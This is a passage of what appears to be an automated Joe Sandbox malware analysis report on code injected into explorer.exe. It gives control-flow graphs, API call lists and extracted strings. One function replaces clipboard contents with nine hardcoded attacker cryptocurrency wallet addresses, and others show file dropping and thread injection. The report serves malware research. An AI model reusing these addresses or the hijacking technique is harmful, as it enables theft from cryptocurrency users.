                                                                                                                                                                                                                        • Opcode ID: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                        • Instruction ID: a8a104613ee2fb971a92ee5858bfa2015dca1bb3b8168b3deff53ccb9a45612c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9ED13D61714A47A5EF10FFA5E8542EC2322A7957CCFC290629F0E9BA9CEF24C709D350
                                                                                                                                                                                                                        Function 0B0B73B0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 880 b0b73b0-b0b73da call b0b7a00 883 b0b73e0-b0b7416 call b0b7960 call b0a2c10 call b0b72a0 call b0b7a90 880->883 892 b0b747b-b0b74a8 call b0a2c10 call b0b72a0 call b0b7a90 883->892 893 b0b7418-b0b7476 call b0a1100 call b0a2c10 call b0b72a0 call b0b7b00 call b0a2c10 call b0b7b50 call b0a1200 883->893 906 b0b74aa-b0b7508 call b0a1100 call b0a2c10 call b0b72a0 call b0b7b00 call b0a2c10 call b0b7b50 call b0a1200 892->906 907 b0b750d-b0b753a call b0a2c10 call b0b72a0 call b0b7a90 892->907 893->892 906->907 927 b0b759f-b0b75cc call b0a2c10 call b0b72a0 call b0b7a90 907->927 928 b0b753c-b0b759a call b0a1100 call b0a2c10 call b0b72a0 call b0b7b00 call b0a2c10 call b0b7b50 call b0a1200 907->928 948 b0b75ce-b0b762c call b0a1100 call b0a2c10 call b0b72a0 call b0b7b00 call b0a2c10 call b0b7b50 call b0a1200 927->948 949 b0b7631-b0b765e call b0a2c10 call b0b72a0 call b0b7a90 927->949 928->927 948->949 969 b0b76c3-b0b76f0 call b0a2c10 call b0b72a0 call b0b7a90 949->969 970 b0b7660-b0b76be call b0a1100 call b0a2c10 call b0b72a0 call b0b7b00 call b0a2c10 call b0b7b50 call b0a1200 949->970 990 b0b76f2-b0b7750 call b0a1100 call b0a2c10 call b0b72a0 call b0b7b00 call b0a2c10 call b0b7b50 call b0a1200 969->990 991 b0b7755-b0b7782 call b0a2c10 call b0b72a0 call b0b7a90 969->991 970->969 990->991 1011 b0b77e7-b0b7814 call b0a2c10 call b0b72a0 call b0b7a90 991->1011 1012 b0b7784-b0b77e2 call b0a1100 call b0a2c10 call b0b72a0 call b0b7b00 call b0a2c10 call b0b7b50 call b0a1200 991->1012 1032 b0b7879-b0b78a6 call b0a2c10 call b0b72a0 call b0b7a90 1011->1032 1033 b0b7816-b0b7874 call b0a1100 call b0a2c10 call b0b72a0 call b0b7b00 call b0a2c10 call b0b7b50 call b0a1200 1011->1033 1012->1011 1053 b0b790b-b0b791a Sleep call b0a1200 1032->1053 1054 b0b78a8-b0b7906 call b0a1100 call b0a2c10 call b0b72a0 call b0b7b00 call b0a2c10 call b0b7b50 call b0a1200 1032->1054 1033->1032 1059 b0b791f 1053->1059 1054->1053 1059->883
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0B7960: OpenClipboard.USER32 ref: 0B0B7971
                                                                                                                                                                                                                          • Part of subcall function 0B0B7960: GetClipboardData.USER32 ref: 0B0B7983
                                                                                                                                                                                                                          • Part of subcall function 0B0B7960: GlobalLock.KERNEL32 ref: 0B0B7994
                                                                                                                                                                                                                          • Part of subcall function 0B0B7960: GlobalUnlock.KERNEL32 ref: 0B0B79A5
                                                                                                                                                                                                                          • Part of subcall function 0B0B7960: CloseClipboard.USER32 ref: 0B0B79AB
                                                                                                                                                                                                                          • Part of subcall function 0B0B7B50: GlobalAlloc.KERNEL32 ref: 0B0B7B78
                                                                                                                                                                                                                          • Part of subcall function 0B0B7B50: GlobalLock.KERNEL32 ref: 0B0B7B8F
                                                                                                                                                                                                                          • Part of subcall function 0B0B7B50: GlobalUnlock.KERNEL32 ref: 0B0B7BA7
                                                                                                                                                                                                                          • Part of subcall function 0B0B7B50: OpenClipboard.USER32 ref: 0B0B7BAF
                                                                                                                                                                                                                          • Part of subcall function 0B0B7B50: EmptyClipboard.USER32 ref: 0B0B7BB5
                                                                                                                                                                                                                          • Part of subcall function 0B0B7B50: SetClipboardData.USER32 ref: 0B0B7BC3
                                                                                                                                                                                                                          • Part of subcall function 0B0B7B50: CloseClipboard.USER32 ref: 0B0B7BC9
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0B0B7910
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • 1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 0B0B7418
                                                                                                                                                                                                                        • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0B0B7660
                                                                                                                                                                                                                        • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0B0B78A8
                                                                                                                                                                                                                        • 0xe082eae973143a32d82db061b6c8885ceba72b87, xrefs: 0B0B74AA
                                                                                                                                                                                                                        • TLTeZMYasNjJd7vSwUvAFPogmBJNruznWP, xrefs: 0B0B753C
                                                                                                                                                                                                                        • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0B0B76F2
                                                                                                                                                                                                                        • LRjCGBFrHsFFehN2kCNc6ds8icUCgLZ6KP, xrefs: 0B0B75CE
                                                                                                                                                                                                                        • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0B0B7784
                                                                                                                                                                                                                        • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0B0B7816
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                        • String ID: 0xe082eae973143a32d82db061b6c8885ceba72b87$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LRjCGBFrHsFFehN2kCNc6ds8icUCgLZ6KP$TLTeZMYasNjJd7vSwUvAFPogmBJNruznWP$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                        • API String ID: 2992153386-1711154317
                                                                                                                                                                                                                        • Opcode ID: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                        • Instruction ID: 9e9223f73755a570ac20a1dd6e1bf9257ee3b11bfbb429439947de852efd754f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CD11961711A46ACEF18EFA1D8A57DD3325A7957CCFC049229E0EABA58FF34C609C350
                                                                                                                                                                                                                        Function 0B0B4F60 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1498 b0b4f60-b0b4fda call b0e0bd0 call b0a9200 1504 b0b4fdc-b0b4fee call b0e0c20 1498->1504 1505 b0b5057-b0b506b call b0e0b60 call b0e0c98 SleepEx 1498->1505 1510 b0b5000-b0b5027 StrChrA call b0e0c28 1504->1510 1511 b0b4ff0-b0b4ff5 call b0b53e0 1504->1511 1518 b0b5029-b0b502c 1510->1518 1519 b0b5030-b0b5033 1510->1519 1511->1505 1518->1519 1520 b0b5052-b0b5055 1519->1520 1521 b0b5035-b0b504d call b0e0c38 call b0b52d0 1519->1521 1520->1505 1520->1510 1521->1520
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0B0B4FBF
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: EnterCriticalSection.KERNEL32 ref: 0B0A9248
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: RtlInitializeCriticalSection.NTDLL ref: 0B0A9255
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrcpyA.KERNEL32 ref: 0B0A928A
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrcpyA.KERNEL32 ref: 0B0A92AD
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrcatA.KERNEL32 ref: 0B0A92BD
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrcatA.KERNEL32 ref: 0B0A92CD
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: LeaveCriticalSection.KERNEL32 ref: 0B0A9354
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: memcpy.MSVCRT ref: 0B0A936C
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrlenA.KERNEL32 ref: 0B0A937A
                                                                                                                                                                                                                        • lstrcmp.KERNEL32 ref: 0B0B4FE6
                                                                                                                                                                                                                        • free.MSVCRT ref: 0B0B505A
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0B0B5065
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292776791-0
                                                                                                                                                                                                                        • Opcode ID: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                        • Instruction ID: d9b7f8af113eaff57f870cbce4fbc510a1f58b896e92c2a56771f624e81a9936
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4218B31219B4185EB59DF65B86039EB3E2FB98B84F884465DA9E47B68EF7CC104CB40
                                                                                                                                                                                                                        Function 0B0AEDF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                        • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                        • Opcode ID: 31f25763a0ca2b1734bd33a2d788d09766f62c840dd230fe312038e7cd8b1677
                                                                                                                                                                                                                        • Instruction ID: 5d05d142bfdf3175dc942b4032a17c9052466e74e7daf78b93fa380d9c6c8c91
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31f25763a0ca2b1734bd33a2d788d09766f62c840dd230fe312038e7cd8b1677
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32311632218681DAD710CFA5E89079BB7B1FBC9744F60142AEB8D83A28EB7DC545CF00
                                                                                                                                                                                                                        Function 0B0AECD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                        • API String ID: 3001812590-790759568
                                                                                                                                                                                                                        • Opcode ID: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                        • Instruction ID: 00023cb48c23bdbf763d845cdc893121498c08dbcd8216c254a4bf32e570cbae
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b14796f1b98f6635dc63a40b56e6665a46fb73289bb7e1a2c95489fb056a86d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD311A322186818AD710CFA5E89038BBBA1F7D9344F54542AEBC983A29DB7CC519CB00
                                                                                                                                                                                                                        Function 0B0A8D90 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 993137029-0
                                                                                                                                                                                                                        • Opcode ID: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                        • Instruction ID: 5f41d32176a5d6349c22bffaba75a01d94dbc8433f7f17e03a2d3852185f1dbe
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C011D36615B4586DB48DF66E89431E7762FB88F80F149525DA1A07724CF38D05AC700
                                                                                                                                                                                                                        Function 0DFEB270 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2372642624-0
                                                                                                                                                                                                                        • Opcode ID: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                        • Instruction ID: e044544b1fd7ca7a47a47ec8840a5eb822a9873badae0f6bb8c6a0d53d26348a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEE08CA1A1270283FF2A17F1A84537913A0EF5CB91F489879CC1F56390EE2DC1DE4324
                                                                                                                                                                                                                        Function 0DF0B270 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2372642624-0
                                                                                                                                                                                                                        • Opcode ID: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                        • Instruction ID: a0131d2576ef16a2fc4d57a0ccf80d57986e29314615c30319c14b22bbf53e9d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDE08CAAA12703C3FF2A97B1684537913A0AF5CB51F489879CC1F46380EE2CC2DA5320
                                                                                                                                                                                                                        Function 0B0BB270 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2372642624-0
                                                                                                                                                                                                                        • Opcode ID: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                        • Instruction ID: 2418e274291401bfa574630fb9ff52238e2934d272c46b1cf01ffd9275a7cf01
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4be638d67715939bf2ef91b5c3647e95478e3e6395d8a8b6c3d9791b43310d4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46E08CA1A1270283FFAD1B7168453AA37A1AB5CB51F641878C90F463A0EF2CC1DF4301
                                                                                                                                                                                                                        Function 0B0A78C0 Relevance: 4.6, APIs: 3, Instructions: 102memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2622297391-0
                                                                                                                                                                                                                        • Opcode ID: c3c3b82c019da38f545e400dafbdc7a126e809098d8c71de87a2eaa1f19f3d8e
                                                                                                                                                                                                                        • Instruction ID: e5d58226ed81a0023dfa785139ed87bb317e4578f286a5e25b4e244bd828ab3d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3c3b82c019da38f545e400dafbdc7a126e809098d8c71de87a2eaa1f19f3d8e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA316D61706B4185EF298F56E55036AB6A2FB48FD4F088936DF9D0BB18EF3CC9418780
                                                                                                                                                                                                                        Function 0B0A8500 Relevance: 4.6, APIs: 3, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 882653843-0
                                                                                                                                                                                                                        • Opcode ID: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                        • Instruction ID: 718ac083751d344cefff938e8fec91bc8adfdc1fad275e5e7be333ccf5b502ec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5431FDA22087808AC7188F76E94436DBBA0F349F88F088206EF984B79ADB2CC454C744
                                                                                                                                                                                                                        Function 0B0B52D0 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0B5070: lstrlenA.KERNEL32 ref: 0B0B5112
                                                                                                                                                                                                                          • Part of subcall function 0B0B5070: InternetCrackUrlA.WININET ref: 0B0B5127
                                                                                                                                                                                                                          • Part of subcall function 0B0B5070: PathFindFileNameA.SHLWAPI ref: 0B0B51A1
                                                                                                                                                                                                                          • Part of subcall function 0B0B5070: GetTempPathA.KERNEL32 ref: 0B0B51BF
                                                                                                                                                                                                                          • Part of subcall function 0B0B5070: GetTempFileNameA.KERNEL32 ref: 0B0B51D5
                                                                                                                                                                                                                          • Part of subcall function 0B0B5070: lstrcatA.KERNEL32 ref: 0B0B51E5
                                                                                                                                                                                                                          • Part of subcall function 0B0B5070: lstrcatA.KERNEL32 ref: 0B0B51F1
                                                                                                                                                                                                                          • Part of subcall function 0B0B5070: CreateFileA.KERNEL32 ref: 0B0B521A
                                                                                                                                                                                                                          • Part of subcall function 0B0AF010: SHGetFolderPathA.SHELL32 ref: 0B0AF063
                                                                                                                                                                                                                          • Part of subcall function 0B0AF010: lstrcatA.KERNEL32 ref: 0B0AF073
                                                                                                                                                                                                                          • Part of subcall function 0B0AF010: lstrcatA.KERNEL32 ref: 0B0AF081
                                                                                                                                                                                                                          • Part of subcall function 0B0AF010: CreateDirectoryA.KERNEL32 ref: 0B0AF08C
                                                                                                                                                                                                                          • Part of subcall function 0B0AF010: SetFileAttributesA.KERNEL32 ref: 0B0AF09A
                                                                                                                                                                                                                          • Part of subcall function 0B0AF010: lstrcatA.KERNEL32 ref: 0B0AF0AA
                                                                                                                                                                                                                          • Part of subcall function 0B0AF010: lstrcatA.KERNEL32 ref: 0B0AF0B8
                                                                                                                                                                                                                          • Part of subcall function 0B0AF010: lstrcatA.KERNEL32 ref: 0B0AF0C8
                                                                                                                                                                                                                        • DeleteFileA.KERNEL32 ref: 0B0B5360
                                                                                                                                                                                                                        • CopyFileA.KERNEL32 ref: 0B0B5376
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0B0B5389
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$Path$AttributesCreateNameTemp$CopyCrackDeleteDirectoryFindFolderInternetlstrlen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3447680573-0
                                                                                                                                                                                                                        • Opcode ID: 671267d60bddb6862d7a4c6da8ec4eee382973f3ae306a35ae2e2ad9b41f222a
                                                                                                                                                                                                                        • Instruction ID: 4a1d40349a924d6fa7073a674c07cdf20863268cffc4118a91b16c007660896d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 671267d60bddb6862d7a4c6da8ec4eee382973f3ae306a35ae2e2ad9b41f222a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3021723232898285EB38DB25F875BDEA791FBEC744F841115898E47A58EF6CC309CB10
                                                                                                                                                                                                                        Function 0B0A8850 Relevance: 4.5, APIs: 3, Instructions: 45threadinjectionCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0A8660: GetCurrentProcessId.KERNEL32 ref: 0B0A86BB
                                                                                                                                                                                                                          • Part of subcall function 0B0A8660: GetCurrentThreadId.KERNEL32 ref: 0B0A86C7
                                                                                                                                                                                                                          • Part of subcall function 0B0A8660: HeapAlloc.KERNEL32 ref: 0B0A86F1
                                                                                                                                                                                                                          • Part of subcall function 0B0A8660: Thread32Next.KERNEL32 ref: 0B0A8750
                                                                                                                                                                                                                          • Part of subcall function 0B0A8660: CloseHandle.KERNEL32 ref: 0B0A8760
                                                                                                                                                                                                                        • OpenThread.KERNEL32 ref: 0B0A889E
                                                                                                                                                                                                                        • SuspendThread.KERNEL32 ref: 0B0A88AF
                                                                                                                                                                                                                          • Part of subcall function 0B0A8C50: GetThreadContext.KERNEL32 ref: 0B0A8C84
